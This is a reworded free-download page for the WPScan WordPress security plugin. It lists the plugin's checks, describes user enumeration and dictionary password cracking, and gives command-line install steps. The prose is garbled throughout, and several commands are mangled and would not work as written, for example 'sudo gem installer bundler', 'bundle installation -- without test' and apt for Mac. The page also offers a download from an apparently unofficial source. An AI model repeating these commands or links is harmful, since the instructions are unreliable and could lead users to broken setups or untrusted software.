Free Download WPScan is a WordPress Security plugins that examines your website for security vulnerabilities by through the database it owns.
As of now, it has more than 21,000 security risks in its database, and has been adding new security vulnerabilities since 2014. By using WPScan it’s not necessary to be concerned about manually scanning your site for security threats.
The security software identifies and identifies the most significant vulnerability that could be a threat to your site. Apart from that, WPScan also scans for logs of debug files as well as poor passwords and backups and much more.
These are just a few of the features that you can avail by using WPScan:
- Automatically checks for WordPress plugin, theme vulnerability
- Database updated to address known WordPress security risks
- Additional security checks
- Notifications via email
Free Download WPScan v.1.15.5 Latest Version
WPScan offers an Free API plan that should be suitable for the majority of WordPress websites, but it there are paid plans available to users who might require greater API access. To access this plugin, WPScan WordPress Security Plugin you must use an API token for free by signing up here.
The Free plan permits up to 25 API calls per calendar day. Check out the various available API plan.
How many API requests do you require?
- Our WordPress scanner sends one API request per WordPress version one request per installed plugin, and one request per theme that is installed.
- On an average an average WordPress website contains 22 installed plugins.
- The Free plan should cover about 50 percent the total number of WordPress websites.
WPScan’s WPScan WordPress Security Plugin will also look for any other security problems that don’t require any API token, for example:
- Check for debug.log files
- Look to see if there are wp-config.php backup files
- Make sure that XML-RPC has been enabled.
- Verify that the repository contains code
- Check if default secret keys are used
- Make sure that you have exported database files
- Weak passwords
- HTTPS is enabled
What does the PLUGIN Do?
- Scans for known WordPress vulnerability as well as plugin vulnerabilities and theme weaknesses;
- Do additional security checks;
- Displays the icon in the Admin Toolbar, which displays the number of security flaws found;
- Notifies you via email whenever new security vulnerabilities are discovered.
WPScan WordPress security scanner features
WordPress Enumeration scans
Attacks based on enumeration involve the attacker trying to determine or prove that something they’re targeting is in the target system. For example, WordPress user enumeration is a method in which an attacker attempts to identify which users are on a particular website. While this alone might not pose a significant security issue, an attacker could be able to exploit this information to carry out an overall attack.
A black box scanner WPScan is not able to gain access to the source code. It employs enumeration methods similar to how a real attacker would use to discover details about an WordPress target. Some of the most popular performed enumeration scans WPScan performs when it scans are:
- Determining the version in WordPress Core, plugins, and themes,
- Verifies whether the database is accessible to the public. wp-config.php backups, as well as other exports from databases
- An inventory of WordPress users.
WordPress username enumeration as well as the weak cracking of passwords (aka”brute force attacks)
As mentioned previously, WPScan can enumerate WordPress users as one of its enumeration functions. It is however, WPScan can also go one step further, attempting to hack passwords with weak security.
This is an excellent thing to do to check the security of your WordPress website for any weak credentials. Cracking passwords is done through the use of WPScan the password dictionary you prefer to use. We will use the part from that rockyou.txt dictionaryin the following example.
WPScan is able to not only identify the version of plugins and themes that are running on the WordPress website however, it also verify the versions of plugins and themes against the huge wpvulndb.com WordPress vulnerability database.
Furthermore, WPScan will also let you know whether that version WordPress you’re running has security weaknesses If this is the case, you’ll have to update to the most recent Version of WordPress.
Let’s install WPScan
It’s fairly simple.
WPScan is compatible with Linux as well as Mac. If you’re Windows people, there’s an VMWare version.
Here are the steps on command line to start it up:
WPScan can be found on Github which is why you’ll need to begin using Git.
- Mac/Debian/Ubunto command:
sudo apt-get install git
- Fedora command:
$ yum install git
- ArchLinux command:
$ pacman -S git
Install Linux Dependencies
If you’re running Linux then you’ll need to install dependencies based on the distribution you’re using.
- Ubuntu 14.04+ command:
sudo apt-get install libcurl4-openssl-dev libxml2 libxml2-dev libxslt1-dev ruby-dev build-essential
- Prior to the Ubunto 14.04 instruction:
sudo apt-get install libcurl4-openssl libxml4-dev ruby-dev
- Debian commands:
sudo apt-get install ruby-git libcurl4-openssl ruby-dev make
- Fedora command:
sudo yum install gcc ruby-devel libxml2 libxml2-devel libxslt libxslt-devel libcurl-devel patch
pacman -Syu ruby
Now it’s time to “git” into it by installing WPScan using the following command:
git clone https://github.com/wpscanteam/wpscan.git
Then, move the directory where it’s located with the command
Install the Bundler
WPScan is a program that runs on Ruby which means it needs “gems.” Use these commands on your system to make the necessary changes to the dependencies.
sudo gem installer bundler and sudo bundle install without testing
sudo gem installer bundler & bundle install without test
sudo gem installer bundler and bundle install without test
bundle installation -- without test --path for vendor/bundle
sudo gem installation bundler and bundle install --without testing
gem installation Typhoeus
gem installation Nokogiri
Be patient, these installs could take as long as ten minutes to finish. After that you’re (almost) at the point of scanning.
Always be sure to update WPScan
Before you run any scans, you must always upgrade WPScan to make sure you’re looking at your website’s performance against the most current list of weaknesses. If you’re not equipped with the latest information then you could be missing the most important vulnerabilities hackers are seeking to take advantage of. To upgrade your WPScan, open the Terminal and enter those commands as follows:
ruby wpscan.rb --update
When you notice that WPScan logo, you’ll are confident that you’re on the right track.
Free Download WPScan v.1.15.5 Latest Version
Copyright Notices: This website is not sharing themes by cloning or cracking. We respect the GNU General Public License (GPL) and the hard work of the theme creator. On this website, we share links that are already stored somewhere else on the internet and are not a part of this website.